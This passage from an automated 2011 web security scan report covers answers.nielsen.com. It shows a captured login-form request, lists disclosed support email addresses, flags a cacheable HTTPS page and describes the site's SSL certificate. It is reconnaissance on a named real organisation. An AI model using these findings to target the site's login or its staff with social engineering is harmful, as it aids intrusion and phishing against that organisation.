POST /gateway/forms/login.fcc HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: http://www.nielsen.com/us/en/client-login.html
Content-Length: 179
Cache-Control: max-age=0
Origin: http://www.nielsen.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118

clienlogininput=Client+ID&clientloginpwd=password&USER=Client+ID&PASSWORD=password&partner=&realm=&target=https%3A%2F%2Fanswers.nielsen.com%2Fportal%2Fsite%2Fanswers&submit=submit

Response

HTTP/1.1 302 Found
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:30 GMT
Server: Apache
Set-Cookie: USER_EMAIL_REJECT=Client ID; path=/; domain=.nielsen.com
Cache-Control: no-store
Location: /gateway/authValidation.htm
Content-Length: 211
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="/gateway/authValidation.htm">here</a>.</p>
</bo
...[SNIP]...

7. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/support/support.jsp

Issue detail

The following email addresses were disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /gateway/support/support.jsp HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:27:39 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48934


<html>
<head>
<title>Nielsen Answers</title>
<style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
font-size: 11px;
color: #333;
}

bo
...[SNIP]...
<A href="mailto:grbtech@nielsen.com">grbtech@nielsen.com</A>
...[SNIP]...
<A href="mailto:ProdHelpLine@nielsen.com">ProdHelpLine@nielsen.com</A>
...[SNIP]...
<A href="mailto:nielsensolutionscentreapac@nielsen.com">nielsensolutionscentreapac@nielsen.com</A>
...[SNIP]...
<A href="mailto:Technical.Support@nielsen.com">Technical.Support@nielsen.com</A>
...[SNIP]...
<A href="mailto:EEMEAHelpdesk@nielsen.com">EEMEAHelpdesk@nielsen.com</A>
...[SNIP]...
<A href="mailto:solutions.eu@nielsen.com">solutions.eu@nielsen.com</A>
...[SNIP]...
<A href="mailto:LatAm.HelpDesk@nielsen.com">LatAm.HelpDesk@nielsen.com</A>
...[SNIP]...

8. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/support/support.jsp

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /gateway/support/support.jsp HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:27:39 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48934


<html>
<head>
<title>Nielsen Answers</title>
<style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
font-size: 11px;
color: #333;
}

bo
...[SNIP]...

9. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  answers.nielsen.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Sun Aug 01 19:00:00 CDT 2010
Valid to:  Wed Aug 01 18:59:59 CDT 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Fri Apr 29 13:04:09 CDT 2011.